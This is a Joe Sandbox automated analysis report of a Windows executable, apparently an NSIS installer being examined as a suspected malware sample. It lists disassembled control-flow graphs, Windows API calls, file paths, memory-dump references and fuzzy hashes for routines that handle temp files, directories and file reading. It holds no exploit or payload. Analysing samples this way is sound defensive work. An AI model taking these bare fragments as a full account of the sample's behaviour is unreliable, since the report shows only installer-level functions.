                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ix8kxoBHDb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-3694760655
                                                  • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                  • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                  • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                  • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 40640a-406415 654 406417-406426 653->654 655 406428-40643e 653->655 654->655 656 406444-406451 655->656 657 406656-40665c 655->657 656->657 660 406457-40645e 656->660 658 406662-40666d 657->658 659 406463-406470 657->659 662 406678-406679 658->662 663 40666f-406673 call 4063e8 658->663 659->658 661 406476-406482 659->661 660->657 664 406643 661->664 665 406488-4064c6 661->665 663->662 669 406651-406654 664->669 670 406645-40664f 664->670 667 4065e6-4065ea 665->667 668 4064cc-4064d7 665->668 673 4065ec-4065f2 667->673 674 40661d-406621 667->674 671 4064f0 668->671 672 4064d9-4064de 668->672 669->657 670->657 678 4064f7-4064fe 671->678 672->671 675 4064e0-4064e3 672->675 676 406602-40660e call 4063e8 673->676 677 4065f4-406600 call 40632f 673->677 679 406630-406641 lstrlenW 674->679 680 406623-40662b call 40640a 674->680 675->671 682 4064e5-4064e8 675->682 691 406613-406619 676->691 677->691 684 406500-406502 678->684 685 406503-406505 678->685 679->657 680->679 682->671 687 4064ea-4064ee 682->687 684->685 689 406540-406543 685->689 690 406507-406525 call 4062b6 685->690 687->678 692 406553-406556 689->692 693 406545-406551 GetSystemDirectoryW 689->693 699 40652a-40652e 690->699 691->679 695 40661b 691->695 697 4065c1-4065c3 692->697 698 406558-406566 GetWindowsDirectoryW 692->698 696 4065c5-4065c9 693->696 700 4065de-4065e4 call 40667c 695->700 696->700 705 4065cb 696->705 697->696 702 406568-406572 697->702 698->697 703 406534-40653b call 40640a 699->703 704 4065ce-4065d1 699->704 700->679 708 406574-406577 702->708 709 40658c-4065a2 SHGetSpecialFolderLocation 702->709 703->696 704->700 706 4065d3-4065d9 lstrcatW 704->706 705->704 706->700 708->709 712 406579-406580 708->712 713 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 709->713 714 4065bd 709->714 715 406588-40658a 712->715 713->696 713->714 714->697 715->696 715->709
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 0040655E
                                                  • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 0040659A
                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,00405487,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000), ref: 00406631
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-2047566092
                                                  • Opcode ID: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
                                                  • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                  • Opcode Fuzzy Hash: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
                                                  • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 780 40176f-401794 call 402c41 call 405d34 785 401796-40179c call 4063e8 780->785 786 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 780->786 791 4017b5-4017b6 call 40667c 785->791 786->791 795 4017bb-4017bf 791->795 796 4017c1-4017cb call 40672b 795->796 797 4017f2-4017f5 795->797 805 4017dd-4017ef 796->805 806 4017cd-4017db CompareFileTime 796->806 799 4017f7-4017f8 call 405eb9 797->799 800 4017fd-401819 call 405ede 797->800 799->800 807 40181b-40181e 800->807 808 40188d-4018b6 call 405450 call 4031d6 800->808 805->797 806->805 809 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 807->809 810 40186f-401879 call 405450 807->810 822 4018b8-4018bc 808->822 823 4018be-4018ca SetFileTime 808->823 809->795 842 401864-401865 809->842 820 401882-401888 810->820 824 402ace 820->824 822->823 826 4018d0-4018db CloseHandle 822->826 823->826 829 402ad0-402ad4 824->829 827 4018e1-4018e4 826->827 828 402ac5-402ac8 826->828 831 4018e6-4018f7 call 40640a lstrcatW 827->831 832 4018f9-4018fc call 40640a 827->832 828->824 838 401901-4022fc call 405a4e 831->838 832->838 838->829 842->820 844 401867-401868 842->844 844->810
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,?,00000031), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp$C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll$C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker$Call
                                                  • API String ID: 1941528284-3502929433
                                                  • Opcode ID: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
                                                  • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                  • Opcode Fuzzy Hash: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
                                                  • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 846 405450-405465 847 40546b-40547c 846->847 848 40551c-405520 846->848 849 405487-405493 lstrlenW 847->849 850 40547e-405482 call 40640a 847->850 851 4054b0-4054b4 849->851 852 405495-4054a5 lstrlenW 849->852 850->849 855 4054c3-4054c7 851->855 856 4054b6-4054bd SetWindowTextW 851->856 852->848 854 4054a7-4054ab lstrcatW 852->854 854->851 857 4054c9-40550b SendMessageW * 3 855->857 858 40550d-40550f 855->858 856->855 857->858 858->848 859 405511-405514 858->859 859->848
                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                  • lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll
                                                  • API String ID: 2531174081-1911264580
                                                  • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                  • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                  • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                  • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 860 40264a-402663 call 402c1f 863 402ac5-402ac8 860->863 864 402669-402670 860->864 865 402ace-402ad4 863->865 866 402672 864->866 867 402675-402678 864->867 866->867 869 4027dc-4027e4 867->869 870 40267e-40268d call 406348 867->870 869->863 870->869 873 402693 870->873 874 402699-40269d 873->874 875 402732-402735 874->875 876 4026a3-4026be ReadFile 874->876 878 402737-40273a 875->878 879 40274d-40275d call 405f61 875->879 876->869 877 4026c4-4026c9 876->877 877->869 881 4026cf-4026dd 877->881 878->879 882 40273c-402747 call 405fbf 878->882 879->869 887 40275f 879->887 884 4026e3-4026f5 MultiByteToWideChar 881->884 885 402798-4027a4 call 40632f 881->885 882->869 882->879 884->887 888 4026f7-4026fa 884->888 885->865 891 402762-402765 887->891 892 4026fc-402707 888->892 891->885 894 402767-40276c 891->894 892->891 895 402709-40272e SetFilePointer MultiByteToWideChar 892->895 896 4027a9-4027ad 894->896 897 40276e-402773 894->897 895->892 898 402730 895->898 900 4027ca-4027d6 SetFilePointer 896->900 901 4027af-4027b3 896->901 897->896 899 402775-402788 897->899 898->887 899->869 902 40278a-402790 899->902 900->869 903 4027b5-4027b9 901->903 904 4027bb-4027c8 901->904 902->874 905 402796 902->905 903->900 903->904 904->869 905->869
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                    • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                  • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                  • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                  • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 906 406752-406772 GetSystemDirectoryW 907 406774 906->907 908 406776-406778 906->908 907->908 909 406789-40678b 908->909 910 40677a-406783 908->910 912 40678c-4067bf wsprintfW LoadLibraryExW 909->912 910->909 911 406785-406787 910->911 911->912
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                  • wsprintfW.USER32 ref: 004067A4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                  • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                  • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 913 40591f-40596a CreateDirectoryW 914 405970-40597d GetLastError 913->914 915 40596c-40596e 913->915 916 405997-405999 914->916 917 40597f-405993 SetFileSecurityW 914->917 915->916 917->915 918 405995 GetLastError 917->918 918->916
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                  • GetLastError.KERNEL32 ref: 00405976
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                  • GetLastError.KERNEL32 ref: 00405995
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 3449924974-4267323751
                                                  • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                  • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                  • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                  • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 919 405f0d-405f19 920 405f1a-405f4e GetTickCount GetTempFileNameW 919->920 921 405f50-405f52 920->921 922 405f5d-405f5f 920->922 921->920 923 405f54 921->923 924 405f57-405f5a 922->924 923->924
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405F2B
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ix8kxoBHDb.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF), ref: 00405F46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1366144971
                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                  • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                  • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 925 73b01777-73b017b6 call 73b01b5f 929 73b018d6-73b018d8 925->929 930 73b017bc-73b017c0 925->930 931 73b017c2-73b017c8 call 73b02352 930->931 932 73b017c9-73b017d6 call 73b02394 930->932 931->932 937 73b01806-73b0180d 932->937 938 73b017d8-73b017dd 932->938 939 73b0182d-73b01831 937->939 940 73b0180f-73b0182b call 73b02569 call 73b015b4 call 73b01272 GlobalFree 937->940 941 73b017f8-73b017fb 938->941 942 73b017df-73b017e0 938->942 947 73b01833-73b0187c call 73b015c6 call 73b02569 939->947 948 73b0187e-73b01884 call 73b02569 939->948 964 73b01885-73b01889 940->964 941->937 943 73b017fd-73b017fe call 73b02d37 941->943 945 73b017e2-73b017e3 942->945 946 73b017e8-73b017e9 call 73b02aac 942->946 957 73b01803 943->957 952 73b017f0-73b017f6 call 73b02724 945->952 953 73b017e5-73b017e6 945->953 960 73b017ee 946->960 947->964 948->964 963 73b01805 952->963 953->937 953->946 957->963 960->957 963->937 968 73b018c6-73b018cd 964->968 969 73b0188b-73b01899 call 73b0252c 964->969 968->929 971 73b018cf-73b018d0 GlobalFree 968->971 975 73b018b1-73b018b8 969->975 976 73b0189b-73b0189e 969->976 971->929 975->968 978 73b018ba-73b018c5 call 73b0153d 975->978 976->975 977 73b018a0-73b018a8 976->977 977->975 979 73b018aa-73b018ab FreeLibrary 977->979 978->968 979->975
                                                  APIs
                                                    • Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DB2
                                                    • Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DB7
                                                    • Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DBC
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B01825
                                                  • FreeLibrary.KERNEL32(?), ref: 73B018AB
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B018D0
                                                    • Part of subcall function 73B02352: GlobalAlloc.KERNEL32(00000040,?), ref: 73B02383
                                                    • Part of subcall function 73B02724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73B017F6,00000000), ref: 73B027F4
                                                    • Part of subcall function 73B015C6: wsprintfW.USER32 ref: 73B015F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
